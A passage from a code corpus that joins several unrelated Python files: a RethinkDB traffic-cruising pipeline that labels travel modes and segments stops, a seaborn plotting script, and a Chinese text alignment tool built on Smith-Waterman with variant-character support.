# print(new_tokenized_word_list, new_gold_label_list, new_raw_label_list)
for word_iter in range(len(new_tokenized_word_list)):
word = new_tokenized_word_list[word_iter]
if word.strip()=="":
continue
gold_label = new_gold_label_list[word_iter]
if word == "'s":
gold_label="O"
raw_label = new_raw_label_list[word_iter]
op_line = word+"\t"+gold_label+"\t"+word+"\t"+raw_label+"\n"
# print(op_line)
fout.write(op_line)
if __name__ == '__main__':
fcc = Fix_Char_Code()
ip_file_name = "test_gold_raw_merged_04_05.txt"
fcc.Read_File(ip_file_name)
ip_file_name = "train_gold_raw_merged_04_05.txt"
fcc.Read_File(ip_file_name)
ip_file_name = "dev_gold_raw_merged_04_05.txt"
fcc.Read_File(ip_file_name)
```
|
{
"source": "jenizar/traffic-cruising-DSSG2017",
"score": 3
}
|
#### File: traffic-cruising-DSSG2017/pipeline/combine_days.py
```python
import rethinkdb as r
def combine_days(db_name, silent=True):
'''Combines days of data into one JSON list.
db_name [str]: a RethinkDB database name
Reads all tables in the given database into memory
and returns them as a list of dicts.'''
indiv_days = r.db(db_name).table_list().run()
if len(indiv_days) > 7:
raise(Exception('Database contains more than 7 days of data:\n' \
+ str(indiv_days) + '\n\nDelete days by connecting to ' \
+ 'RethinkDB from python (and running `r.table_drop(<tablen' \
+ 'ame>).run()`, without backticks. See docs for more info.'))
if len(indiv_days) == 0:
raise(Exception("Database contains no tables. Either you're" \
+ "connected to the wrong database, the pipeline hasn't" \
+ "been run yet, or the pipeline is broken."))
if silent == False:
print('Combining ' + str(len(indiv_days)) + ' days of trips.')
combined = []
for i in range(len(indiv_days)):
if silent == False:
print('Appending day ' + str(i + 1) + ' of ' \
+ str(len(indiv_days)) + '.')
temp = list(r.db(db_name).table(indiv_days[i]).run())
combined.extend(temp)
return combined
```
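A minimal usage sketch for `combine_days` (the database name and connection details below are assumptions, not part of the original pipeline):

```python
import rethinkdb as r

from combine_days import combine_days

# combine_days issues .run() without an explicit connection, so register a
# default (repl) connection first.
r.connect(host='localhost', port=28015).repl()

trips = combine_days('cleaned_trips', silent=False)
print(len(trips), 'trip documents loaded')
```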
#### File: traffic-cruising-DSSG2017/pipeline/label_modes.py
```python
def label_modes(trip_list, silent=True):
"""Labels trip segments by likely mode of travel.
Labels are "chilling" if traveler is stationary, "walking" if slow,
"driving" if fast, and "bogus" if too fast to be real.
trip_list [list]: a list of dicts in JSON format.
silent [bool]: if True, does not print reports.
Returns list of dicts in JSON format."""
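    # Speed thresholds (m/s): 0 -> "chilling", (0, 2.3) -> "walking", >= 2.3 -> "driving",
    # and anything above 22.22 m/s (~80 km/h) is marked "bogus". A second pass re-labels
    # the reads between two driving reads as all walking or all driving, depending on how
    # long the walking run is and whether the traveler returned to the same intersection.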
if silent == False:
print('Preparing to label modes of travel for ' \
+ str(len(trip_list)) + ' trips.')
loop_counter = 0
loop_size = len(trip_list)
for doc in trip_list:
if silent == False:
loop_counter = loop_counter + 1
if loop_counter % 10000 == 0:
print('Labeling modes. Finished ' + str(loop_counter) \
+ ' trips.')
time_spent_driving = 0
time_spent_walking = 0
time_spent_chilling = 0
time_spent_bogus = 0
for i in range(1,len(doc['reduction'])):
if (float(doc['reduction'][i]['velocity']) >= 2.3):
doc['reduction'][i]['mode'] = 'driving'
elif (float(doc['reduction'][i]['velocity']) < 2.3 and float(doc['reduction'][i]['velocity']) > 0):
doc['reduction'][i]['mode'] = 'walking'
elif (float(doc['reduction'][i]['velocity']) == 0.0):
doc['reduction'][i]['mode'] = 'chilling'
if (float(doc['reduction'][i]['velocity']) > 22.22):
doc['reduction'][i]['mode'] = 'bogus'
for i in range(1,len(doc['reduction']) - 1):
path_length = 0
if (doc['reduction'][i]['mode'] == 'driving'):
for j in range(i+1,len(doc['reduction'])):
last_intersection_id = doc['reduction'][j]['IntersectionID']
if (doc['reduction'][j]['mode'] == 'walking'): path_length = path_length + 1
elif (doc['reduction'][j]['mode'] == 'driving' or doc['reduction'][j]['mode'] == 'bogus'): break
if (path_length > 5 or last_intersection_id == doc['reduction'][i]['IntersectionID']):
for k in range(i+1,j):
if (doc['reduction'][k]['mode'] != 'chilling'): doc['reduction'][k]['mode'] = 'walking'
else :
for k in range(i+1,j):
if (doc['reduction'][k]['mode'] != 'chilling'): doc['reduction'][k]['mode'] = 'driving'
if (doc['reduction'][i]['mode'] == 'driving'): time_spent_driving = time_spent_driving + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'walking'): time_spent_walking = time_spent_walking + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'chilling'): time_spent_chilling = time_spent_chilling + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'bogus'): time_spent_bogus = time_spent_bogus + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
if (doc['reduction'][-1]['mode'] == 'driving'): time_spent_driving = time_spent_driving + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'walking'): time_spent_walking = time_spent_walking + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'chilling'): time_spent_chilling = time_spent_chilling + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'bogus'): time_spent_bogus = time_spent_bogus + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
duration_of_trip = float(doc['duration_of_trip'])
doc['time_percentage_driving'] = str(time_spent_driving/duration_of_trip*100)
doc['time_percentage_walking'] = str(time_spent_walking/duration_of_trip*100)
doc['time_percentage_chilling'] = str(time_spent_chilling/duration_of_trip*100)
doc['time_percentage_bogus'] = str(time_spent_bogus/duration_of_trip*100)
if silent == False:
print('Done labeling mode of travel. Returning list of length ' \
+ str(len(trip_list)) + '.')
return trip_list
```
#### File: traffic-cruising-DSSG2017/pipeline/segment_stops.py
```python
import numpy as np
import itertools as itt
def segment_stops(trip_list, stop_dur=10, append_tag=True, retain_stops=True,
silent=True):
"""Splits trips if there are sufficiently large stops, returns new table name.
trip_list [list]: a list of dicts in JSON format.
stop_dur [int]: duration of stops (in minutes) that will be used
to split trips.
append_tag [bool]: should trips that get split have tags
(_S0, _S1, _S2, etc.) appended to their hashes?
retain_stops [bool]: if True, all mid-stop reads will be included with the
segments before and after the stop
silent [bool]: if True, does not print reports.
You'll want to rerun filter_short_trips after using this function.
Does not work on routed data.
Returns list of dicts in JSON format."""
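    # Overview: a stop is a run of consecutive reads at the same intersection lasting at
    # least `stop_dur` minutes; each such stop splits the trip into segments, and the
    # segmented trips replace the original documents in the returned list.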
if silent == False:
print('Segmenting trips before and after stops > ' \
+ str(stop_dur) + ' minutes. Processing '+ str(len(trip_list)) \
+ ' trips.')
#find hashes with multiple trips and identify where to split them
splits = []
for j in range(len(trip_list)):
#sort reduction by time (just to be on the safe side)
reduc = trip_list[j]['reduction']
l = range(len(reduc))
time_order = np.argsort([reduc[i]['time'] for i in l])
rreduc = [reduc[i] for i in time_order]
#get times and intersection IDs associated with sensor reads
times = [rreduc[i]['time'] for i in l]
hit_ids = [rreduc[i]['IntersectionID'] for i in l] #get list of intersections
#identify stops that are >= stop_dur minutes (big stops)
hits_per_sensor = [sum(1 for _ in gp) for x, gp in itt.groupby(hit_ids)] #get run lengths
repeat_sensors = [ind for ind, item in enumerate(hits_per_sensor) if item > 1] #which run lengths > 1?
cs = np.cumsum(hits_per_sensor) #used to find stop endpoints
rep_end_inds = [cs[i]-1 for i in repeat_sensors] #indices of final times for sensors with repeats
hits_per_repeat = [hits_per_sensor[i] for i in repeat_sensors]
rep_start_inds = list(map(lambda x, y : x - y + 1, rep_end_inds, hits_per_repeat))
rep_durs = [int(times[rep_end_inds[i]]) - int(times[rep_start_inds[i]]) for i in range(len(rep_end_inds))]
big_stops = [ind for ind, item in enumerate(rep_durs) if item >= stop_dur*60]
#find the temporal endpoints of big stops, and the location
stop_bounds = [(times[rep_start_inds[i]], times[rep_end_inds[i]],
hit_ids[i]) for i in big_stops]
#if there are any, add the whole doc to new list, along with segment bounds
if len(stop_bounds):
splits.append([trip_list[j], stop_bounds])
if silent == False:
print('Found ' + str(len(splits)) \
+ ' trips that need to be segmented.')
#for each trip that needs to be split, create a list of integer categories
#representing which reads will be allocated to each new segment
break_schemes = [None] * len(splits) #create a list to hold lists of segment #s
for i in range(len(splits)): #for each trip that needs to be split
reads = splits[i][0]['reduction'] #get the reads
break_schemes[i] = np.repeat(0, len(reads)) #assign all reads 0
for j in range(len(splits[i][1])): #for each time the trip needs to be segmented
stop_beginning = int(splits[i][1][j][0]) #get the moment they stopped
stop_end = int(splits[i][1][j][1]) #and the moment they started moving again
for k in range(len(reads)): #for each read
read_time = int(reads[k]['time'])
if read_time > stop_beginning and read_time < stop_end: #does the read take place mid-stop?
break_schemes[i][k] = -j - 1 #then mark it as a negative segment number
elif read_time >= stop_end: #does it follow the stop?
break_schemes[i][k] = j + 1 #then assign it a positive segment number
if silent == False:
print('Determined splitting scheme.')
#now do the actual splitting
segs = []
for i in range(len(break_schemes)): #for all trips that need to be split
scheme = list(map(int, break_schemes[i])) #convert scheme to int
hsh = splits[i][0]['group'] #get the original hash
moving_segs = set([abs(scheme[i]) for i in range(len(scheme))])
for j in moving_segs: #for each new trip...
if retain_stops == True: #if you want to keep reads taken during stops...
jj = (j, -j, -(j+1)) #include the trip and the full stop on either side
seg = [splits[i][0]['reduction'][k] for k in range(len(scheme)) if scheme[k] in jj]
else: #otherwise keep the trip and the stop boundaries on either side
seg = [splits[i][0]['reduction'][k] for k in range(len(scheme)) if scheme[k] == j]
if append_tag == True: #label each new trip with a unique tag if desired
newhash = hsh + '_S' + str(j)
segs.append({'group':newhash,'reduction':seg})
elif append_tag == False:
segs.append({'group':hsh,'reduction':seg})
else:
raise ValueError("arg 'append_tag' must be logical")
#filter segmented trip_list from list
ids = set([splits[i][0]['id'] for i in range(len(splits))])
preseg_removed = [trip_list[i] for i in range(len(trip_list)) if trip_list[i]['id'] not in ids]
#append segmented trip_list to list and upload to the new table
out = preseg_removed + segs
# r.table(table_name).insert(out).run()
# cursor.close() #see todo list
# return table_name
if silent == False:
print('Done with stop segmentation. Returning list of length ' \
+ str(len(out)) + '. Now use filter_short_trips.')
return out
```
|
{
"source": "jenjoit/ML_Pipeline_Template",
"score": 3
}
|
#### File: src/visualization/exploratory.py
```python
import click
import matplotlib
matplotlib.use('agg')
import seaborn as sns
import sys
sys.path.append('src')
from data import read_processed_data
def exploratory_visualization(dframe):
return sns.pairplot(dframe, diag_kind='kde', vars=['x0', 'x1', 'x2', 'x3'], hue='y')
@click.command()
@click.argument('input_file', type=click.Path(exists=True, dir_okay=False))
@click.argument('output_file', type=click.Path(writable=True, dir_okay=False))
def main(input_file, output_file):
print('Plotting pairwise distribution...')
dframe = read_processed_data(input_file)
plot = exploratory_visualization(dframe)
plot.savefig(output_file)
if __name__ == '__main__':
main()
```
|
{
"source": "jenjouhung/multple_align_ssw",
"score": 2
}
|
#### File: jenjouhung/multple_align_ssw/mytest.py
```python
import datetime
from src import *
import sys,getopt
import os
def align_init(allSymbols,variantTable=None):
    if variantTable:
        #use a UnicodeTextScoreMatrix built with the variant-character table
        mUTSM=UnicodeTextScoreMatrix(alphabet=allSymbols,variantTable=variantTable)
    else:
        #use a plain UnicodeTextScoreMatrix
        mUTSM=UnicodeTextScoreMatrix(alphabet=allSymbols)
    # initialize the aligner object with the UnicodeTextScoreMatrix
    # TODO: add a score threshold
    alignerObject = Aligner(matrix=mUTSM)
    return alignerObject
def align(
    refID,refString,qryID,qryString,
    msgType = 2, # 1: production output, 2: debug output
    quickMode = False, # Joey quick mode
    minLen=10, #stop once the strings to compare/display fall below this length
    distinctChars=None, #pre-computed distinct characters (optional)
    variantTable=None, # variant-character table; passing one enables variant matching (optional)
    multipleAlignment=False #whether to split and re-align the remaining ranges
    ):
    #counters for progress reporting
    num_turns=0
    compareTaskQueue=[] #queue of pending comparison ranges
    msg =[] #accumulated report lines
    t0 = datetime.datetime.now()
    #set of distinct characters
dcs = distinctChars if distinctChars else "".join(set(list(refString)+list(qryString)))
# if distinctChars:
# dcs=distinctChars
# else:
# dcs="".join(set(list(refString)+list(qryString)))
    #initialize the aligner
    aligner = align_init(dcs,variantTable)
    #if both strings reach the minimum length, enqueue the full ranges for comparison
    if (len(refString)>=minLen and len(qryString)>=minLen):
        compareTaskQueue=[(0,len(refString),0,len(qryString))]
    while(len(compareTaskQueue)>0):
        num_turns+=1 #loop counter
        #pop a comparison range from the queue
        # crBegin reads as compare_ref_begin
        # cqBegin reads as compare_qry_begin
        comInterval=compareTaskQueue.pop()
        crBegin,crEnd,cqBegin,cqEnd=comInterval
        #slice out the substrings for this round
crString=refString[crBegin:crEnd]
cqString=qryString[cqBegin:cqEnd]
# t2 = datetime.datetime.now()
        #run the alignment; reverse-complement matching (a DNA-only option) is disabled
alignment = aligner.align(reference=crString, query=cqString,qMode=quickMode,revcomp=False)
# t3 = datetime.datetime.now()
#print ("第{}次比對,花費:{:.7f} 秒".format(num_turns,(t3 - t2).microseconds*0.000001))
        #get the score and aligned lengths
arScore=alignment.score
arLen=alignment.reference_end-alignment.reference_begin
aqLen=alignment.query_end-alignment.query_begin
        #an aligned region at least minLen long means a valid segment was found
        if ((arLen >=minLen) and (aqLen >=minLen)):
            msg=alignReport(alignment,refID,crString,qryID,cqString,comInterval,msgType,nturn=num_turns)
            #if multipleAlignment == True, split the remaining ranges and enqueue them
            #this part may be dropped entirely
            # archived on 2020/03/09
# if (multipleAlignment):
# if ((arBegin-crBegin)>=minLen and (aqBegin-cqBegin)>=minLen):
# compareTaskQueue.append((crBegin,arBegin,cqBegin,aqBegin))
# if ((cqEnd-aqEnd)>=minLen and (crEnd-arEnd)>=minLen):
# compareTaskQueue.append((arEnd,crEnd,aqEnd,cqEnd))
return msg
def alignReport(alignment, refID,crString,qryID,cqString,compareInterval,
msgType=2,nturn=-1):
    # msgType = 1: production (tab-separated) output
    # msgType = 2: debug output
    # msgType = 3: the library's original report
crBegin,crEnd,cqBegin,cqEnd=compareInterval
arBegin=alignment.reference_begin+crBegin
arEnd=alignment.reference_end+crBegin
    #aqBegin reads as align_qry_begin
aqBegin=alignment.query_begin+cqBegin
aqEnd=alignment.query_end+cqBegin
# arBegin2=alignment.reference_begin2+crBegin
# aqBegin2=alignment.query_begin2+cqBegin
arScore=alignment.score
# arLen=alignment.reference_end-alignment.reference_begin
# aqLen=alignment.query_end-alignment.query_begin
msg =[]
# class Alignment(object):
# def __init__ (self, alignment, query, reference, matrix=None):
#sid1,sid2,score,align1,align2,s1_start,s1_end,s2_start,s2_end
#P1618_001_0007,T1799_001_0034,38,眾生---生死相續皆由不知常住真心,眾生無始生-死相續皆由不知常住真心,23,36,2,17
    if (msgType ==1): #check whether output mode 1 was requested
m=alignment.alignment
r = [refID,qryID,arScore,m[0].replace("〇","-"),m[2].replace("〇","-"),crBegin,crEnd,cqBegin,cqEnd]
s="\t".join(str(d) for d in r)
msg.append(s)
    elif (msgType==2): #check whether output mode 2 (debug) was requested
msg.append("======== My Report #{} ========== ".format(nturn))
msg.append("比對對象:Ref[{}:{}] (ID:{}):: Query[{}:{}] (ID:{}) ".format(crBegin,crEnd,refID,cqBegin,cqEnd,qryID))
msg.append("[原]最佳比對位置:Ref[{}:{}] :: Query[{}:{}] ".format(arBegin,arEnd,aqBegin,aqEnd))
# msg.append("最佳比對位置:Ref[{}:{}] :: Query[{}:{}] ".format(arBegin2,arEnd,aqBegin2,aqEnd))
# if not (arBegin ==arBegin2) or not (aqBegin ==aqBegin2):
# print("[mismatch] 出發點不同!!")
msg.append("結果:score={}, 比對句:".format(arScore))
# msg.append("結果2:n_score={}, 比對句:".format(alignment.n_score))
# msg.append("------ original align message -----")
msg+=alignment.alignment
# msg.append("------ new align message -----")
# msg+=alignment.alignment_n
# msg.append(" "*4+"Ref [{}:{}]({}) {}".format(arBegin,arEnd,arLen,refString[arBegin:arEnd]))
# msg.append(" "*4+"Qry [{}:{}]({}) {}".format(aqBegin,aqEnd,aqLen,qryString[aqBegin:aqEnd]))
elif (msgType==3):
r=alignment.alignment_report()
#r=alignment.alignment
msg.append(r)
return msg
def usage():
print("usage: mytest.py [-o output FILE ] [-dpqv] FILE1 [FILE2] ")
# main function starts here:
FILE_PATH=os.path.dirname(__file__)
#key flow-control parameters, driven by the command-line arguments
OUTPUT_filename=None
inputFormat="fullText" # options: "fullText" or "sentencePair"
variantMode = False # True/False: whether to enable variant-character matching
variantFileLocation =os.path.join(FILE_PATH,"data","variants.txt")
mssageType=1 # 1: production output, 2: debug output (enable with -d on the command line)
qMode=False # Joey quick mode
try:
opts, args = getopt.getopt(sys.argv[1:], "dqpvo:")
except getopt.GetoptError as err:
# print help information and exit:
print(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
#extract the option flags and their values
for opt,value in opts:
if "-o" in opt:
OUTPUT_filename = value
if "-p" in opt:
inputFormat = "sentencePair"
if "-v" in opt:
variantMode = True
if "-d" in opt:
mssageType=2
if "-q" in opt:
qMode = True # Joey 加速Mode
#full-text mode requires two input files
#check that FILE1 and FILE2 were both given
if (inputFormat=="fullText" and len(args) !=2) :
print ("Please specify FILE1 and FILE2 for comparsion.")
usage()
sys.exit(2)
elif (inputFormat=="sentencePair" and len(args) !=1) :
print ("Please specify Sentence Pair FILE for comparsion.")
usage()
sys.exit(2)
compareStringArray=[] #list of (id1, text1, id2, text2) tuples to compare
if (OUTPUT_filename): print("開始執行比對:")
if inputFormat == "fullText":
    #open the reference & query files
    # 2020/03/09: input format changed to "id \tab text"
with open(args[0],'r') as ifile1, open(args[1],'r') as ifile2:
print("資料模式:兩全文檔比對")
print("Reading Files:{},{}".format(args[0],args[1]))
ref=ifile1.read().strip().split("\t")
qry=ifile2.read().strip().split("\t")
compareStringArray.append((ref[0],ref[1],qry[0],qry[1]))
elif inputFormat == "sentencePair":
    # 2020/03/09: input format changed to "id1 \tab text1 \tab id2 \tab text2"
    #open the file and read the sentence pairs line by line
print("Reading File:{}".format(args[0]))
print("資料模式:Sentence Pair")
with open(args[0],'r') as ifile1:
for s in ifile1:
compareStringArray.append(tuple(s.strip().split("\t")))
vt=None
if variantMode:
    vt=VariantTable(variantCSVFile=variantFileLocation)
    print("異體字比對:On")
loop=0
t0 = datetime.datetime.now()
alignMessges=[]
task_length=len(compareStringArray)
while (len(compareStringArray)):
if (loop%1000)==0:
tnow = datetime.datetime.now()
tms=(tnow-t0).microseconds
progress = loop/task_length*100
speed = (tms)/(loop+1)
expTime = speed*(task_length-loop)*0.000001
#print("\r開始比對... {:.0f}% ({:.2f} ms/pair) (剩餘時間:{:.2} sec)".format(progress,speed,expTime),end="",flush=True)
if (OUTPUT_filename): print("\r開始比對... {:.0f}% ".format(progress),end="",flush=True)
refID,refString,qryID,qryString = compareStringArray.pop()
loop+=1
#print("{},".format(loop),end="")
# endtime = datetime.datetime.now()
# print ("執行完成,花費:{:.6f} 秒".format((endtime-starttime).microseconds*0.000001))
rMsg = align(refID,refString,qryID,qryString,mssageType,quickMode=qMode,variantTable=vt)
alignMessges.extend(rMsg)
if (not OUTPUT_filename):
for m in rMsg:
print(m)
t1= datetime.datetime.now()
print ("")
print ("執行完成,花費:{} 秒".format((t1-t0).seconds))
#取得內建 report 字串
# r=alignment.alignment_report()
# #先用簡單作法,讓字元能夠正確對應,之後會修正
# r=r.replace("|","|").replace("*","*").replace("-","〇")
if (OUTPUT_filename):
print ("結果輸出於:{}".format(OUTPUT_filename))
with open(OUTPUT_filename,'w') as ofile:
ofile.write("\r\n".join(alignMessges))
```
#### File: multple_align_ssw/src/iupac.py
```python
import six
from six.moves import range
__all__ = (
"NucleotideTable",
"NucleotideAlphabet",
"NucleotideComplementTable",
"nucleotide_reverse_complement",
)
def _build_compliment_table():
_ctable = list(map(chr, range(0xff + 1)))
for symbol in NucleotideAlphabet:
complement = NucleotideTable[symbol]["complement"]
_ctable[ord(symbol)] = complement
_ctable[ord(symbol.lower())] = complement.lower()
return str.join('', _ctable)
def _iupac_info(complement, matches):
return {
"complement": complement.upper(),
"matches": tuple(matches.upper())
}
NucleotideTable = {
'A': _iupac_info('T', 'A'),
'G': _iupac_info('C', 'G'),
'C': _iupac_info('G', 'C'),
'T': _iupac_info('A', 'T'),
'U': _iupac_info('A', 'T'),
'M': _iupac_info('K', 'AC'),
'R': _iupac_info('Y', 'AG'),
'Y': _iupac_info('R', 'CT'),
'S': _iupac_info('S', 'CG'),
'W': _iupac_info('W', 'AT'),
'K': _iupac_info('M', 'GT'),
'B': _iupac_info('V', 'CGT'),
'D': _iupac_info('H', 'AGT'),
'H': _iupac_info('D', 'ACT'),
'V': _iupac_info('B', 'ACG'),
'N': _iupac_info('N', 'AGCT')
}
NucleotideAlphabet = str.join('', tuple(NucleotideTable.keys()))
NucleotideComplementTable = _build_compliment_table()
def nucleotide_reverse_complement(sequence):
    return sequence[::-1].translate(NucleotideComplementTable)
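# Example: nucleotide_reverse_complement("ATGCn") == "nGCAT"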
```
|
{
"source": "jenjouhung/ssw",
"score": 2
}
|
#### File: jenjouhung/ssw/unissw_dila.py
```python
from unissw import *
from pathlib import Path
import sys
import getopt
import os
import json
from multiprocessing import Pool
class TaskObj():
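    # Lightweight, picklable container bundling everything a single comparison task
    # needs, so one object can be handed to each multiprocessing worker.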
def __init__(self, config, messageType, variantMode, variantFile, task, logLevel=3):
self.config = config
self.logLevel = logLevel
self.messageType = messageType
self.variantMode = variantMode
self.variantFile = variantFile
self.task = task
def usage():
print("usage: python3 unissw_dila.py [-c config FILE] -t task FILE")
def resolveSentRange(segsDict, idRange):
"""
segsDict 區段字典, key:text
idRange id 區段,可能為x 或 x..y ex: (10 or 11..13)
"""
"""
"""
if (".." in idRange):
s, e = idRange.split("..")
r = ""
# print ("------")
# print("[{}]{}".format(s,segsDict[s]))
# print("[{}]{}".format(e,segsDict[e]))
# 考慮到最後一段才可能不滿...
r = segsDict[e] # 最後拿滿
for n in range(int(e)-1, int(s)-1, -1):
# print("n="+str(n))
L = len(segsDict[str(n)])/2
# print("Length={}".format(L))
r = segsDict[str(n)][:int(L)]+r # 其他拿前半
return r
else:
# print ("------")
# print("[{}]{}".format(idRange,segsDict[idRange]))
return segsDict[idRange]
def check_sent_file(fn):
i = 0
with open(fn, 'r') as file:
for line in file:
i += 1
a = line.strip().split("\t")
if len(a) < 2:
print(f"讀取 sent 檔案發生錯誤: {fn}")
print(f"行號: {i}")
print(f"line text: {line}")
def process_task_record(tr, config, logLevel=3):
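    # Reads one task record from the task file, loads its inputs according to
    # data_type ("p" pair file with texts, "s"/"sc" separate id and sentence files,
    # "r" offset ranges into full texts, "t" two single-text files) and returns
    # (output_file, list of (id1, text1, id2, text2) tuples, log messages).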
r = []
output_file = None
logMessages = []
    # resolve file_base
    file_base = os.path.dirname(__file__)
    if ("data_folder" in tr):
        file_base = tr["data_folder"]
    # task ID
    trid = tr["task_id"] if "task_id" in tr else "Unknown"
    # resolve output_file, if any
    if ("output_file" in tr):
        output_file = os.path.join(file_base, tr["output_file"])
    if logLevel >= 1:
        logMessages.append("[#TID:{}][#TaskStart]".format(trid))
        # print(logMessages[-1])
    # dispatch on data_type and build the comparison list for this task record
    if (tr["data_type"] == "p"):  # (P)air mode: the pair file itself contains the texts to compare
if not ("pair_file" in tr):
raise SystemExit(
"Error: 11 Task FILE ERROR: must set pair_file when data_type set to p. \n Occucrs in{}".format(tr))
pair_file = os.path.join(file_base, tr["pair_file"])
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#DataMode]資料模式:Sentence Pair".format(trid))
logMessages.append(
"[#TID:{}][#PairFILE]Reading File:{}".format(trid, pair_file))
if logLevel >= 3:
print("\n".join(logMessages[-2:]))
with open(pair_file, 'r') as ifile1:
for s in ifile1:
# 內容格式為:id1 \tab text1 \tab id2 \tab text2
r.append(tuple(s.strip().split("\t")))
    # (S)eparate mode: ids and sentences are stored in separate files
elif (tr["data_type"] == "s" or tr["data_type"] == "sc"):
CCCTH = -1 # common_char_count_th
if not ("pair_file" in tr):
raise SystemExit(
"Error: 11 Task FILE ERROR: must set pair_file when data_type set to s. \n Occucrs in{}".format(tr))
if not ("sent_file1" in tr):
raise SystemExit(
"Error: 12 Task FILE ERROR: must set sent_file1 when data_type set to s. \n Occucrs in{}".format(tr))
if not ("sent_file2" in tr):
raise SystemExit(
"Error: 13 Task FILE ERROR: must set sent_file2 when data_type set to s. \n Occucrs in{}".format(tr))
if tr["data_type"] == "s":
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#DataMode]資料模式:pair, sentence 分離模式".format(trid))
if tr["data_type"] == "sc":
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#DataMode]資料模式:pair, sentence 分離模式 (有common character count)".format(trid))
if logLevel >= 3:
print(logMessages[-1])
sent_file1 = os.path.join(file_base, tr["sent_file1"])
sent_file2 = os.path.join(file_base, tr["sent_file2"])
pair_file = os.path.join(file_base, tr["pair_file"])
with open(sent_file1, 'r') as sfile1, open(sent_file2, 'r') as sfile2, open(pair_file, 'r') as pfile:
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#SentFILE-1]讀取資料檔:{}".format(trid, sent_file1))
try:
s1 = dict([(line.strip().split("\t")) for line in sfile1])
except:
check_sent_file(sent_file1)
raise
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#SentFILE-2]讀取資料檔:{}".format(trid, sent_file2))
print("[#TID:{}][#SentFILE-2]讀取資料檔:{}".format(trid, sent_file2))
s2 = dict([(line.strip().split("\t")) for line in sfile2])
if logLevel >= 3:
print("\n".join(logMessages[-2:]))
plines = [line.strip().split("\t") for line in pfile]
if tr["data_type"] == "s":
                r = [(sid1, s1[sid1], sid2, s2[sid2])
                     for sid1, sid2 in plines]
elif tr["data_type"] == "sc":
if "common_char_count_th" in config:
CCCTH = int(config["common_char_count_th"])
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Info]啟用:common_char_count_th 設定:{}".format(trid, CCCTH))
else:
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Info]找不到 common_char_count_th 設定,使用預設值:{}".format(trid, CCCTH))
if logLevel >= 3:
print(logMessages[-1])
r = [(sid1, s1[sid1], sid2, s2[sid2])
for sid1, sid2, ccc in plines if int(ccc) >= CCCTH]
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Info]共有{}筆 pair 資料".format(trid, len(r)))
if logLevel >= 3:
print(logMessages[-1])
elif (tr["data_type"] == "r"): # (o)ffset mode:
# pair 檔中紀錄為資料檔的offset 值
# datafile 內就是原卷大小,一整個檔。
if not ("pair_file" in tr):
raise SystemExit(
"Error: 11 Pair FILE ERROR: must set pair_file when data_type set to r. \n Occucrs in{}".format(tr))
if not ("text_file1" in tr):
raise SystemExit(
"Error: 14 text FILE ERROR: must set text_file1 when data_type set to r. \n Occucrs in{}".format(tr))
if not ("text_file2" in tr):
raise SystemExit(
"Error: 15 text FILE ERROR: must set text_file2 when data_type set to r. \n Occucrs in{}".format(tr))
if logLevel >= 3:
print(logMessages[-1])
text_file1 = os.path.join(file_base, tr["text_file1"])
text_file2 = os.path.join(file_base, tr["text_file2"])
pair_file = os.path.join(file_base, tr["pair_file"])
with open(text_file1, 'r') as tfile1, open(text_file2, 'r') as tfile2, open(pair_file, 'r') as pfile:
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Text_file-1]讀取資料檔:{}".format(trid, text_file1))
text1 = tfile1.read().strip()
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Text_file-2]讀取資料檔:{}".format(trid, text_file2))
text2 = tfile2.read().strip()
if logLevel >= 3:
print("\n".join(logMessages[-2:]))
for line in pfile:
fieds = line.strip().split("\t")
sid1F, sid1T = tuple(fieds[0].split("..")[:2])
sid2F, sid2T = tuple(fieds[1].split("..")[:2])
str1 = text1[int(sid1F):int(sid1T)+1]
str2 = text2[int(sid2F):int(sid2T)+1]
# print("{}:{}({}) - {}:{}({}) ".format(
# sid1F,sid1T,str1,
# sid2F,sid2T,str2))
r.append((fieds[0], str1, fieds[1], str2))
elif (tr["data_type"] == "t"): # (T)wo texts mode: 兩個文字檔,各自內含一句。
if not ("sent_file1" in tr):
raise SystemExit(
"Error: 12 Task FILE ERROR: must set sent_file1 when data_type set to t. \n Occucrs in{}".format(tr))
if not ("sent_file2" in tr):
raise SystemExit(
"Error: 13 Task FILE ERROR: must set sent_file2 when data_type set to t. \n Occucrs in{}".format(tr))
sent_file1 = os.path.join(file_base, tr["sent_file1"])
sent_file2 = os.path.join(file_base, tr["sent_file2"])
with open(sent_file1, 'r') as ifile1, open(sent_file2, 'r') as ifile2:
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#DataMode]資料模式:兩全文檔比對".format(trid))
logMessages.append("[#TID:{}][#PairFILE]Reading Files:\n [1] {} \n [2] {}".format(
trid, sent_file1, sent_file2))
if logLevel >= 3:
print("\n".join(logMessages[-2:]))
ref = ifile1.read().strip().split("\t")
qry = ifile2.read().strip().split("\t")
r.append((ref[0], ref[1], qry[0], qry[1]))
else:
raise SystemExit("Error: 1X unsupported data type:{}. \n Occucrs in{}".format(
tr["data_type"], tr))
return output_file, r, logMessages
# worker function shared by the multiprocessing pool
def processTask(taskobj):
#print("開始進行Task: {}/{}".format(i+1,len(tasks)))
trid = taskobj.task["task_id"] if "task_id" in taskobj.task else "Unknown"
logLevel = taskobj.logLevel
OUTPUT_filename, compareStringArray, logMessages = process_task_record(
taskobj.task, taskobj.config, logLevel)
print_to_file = True if OUTPUT_filename else False
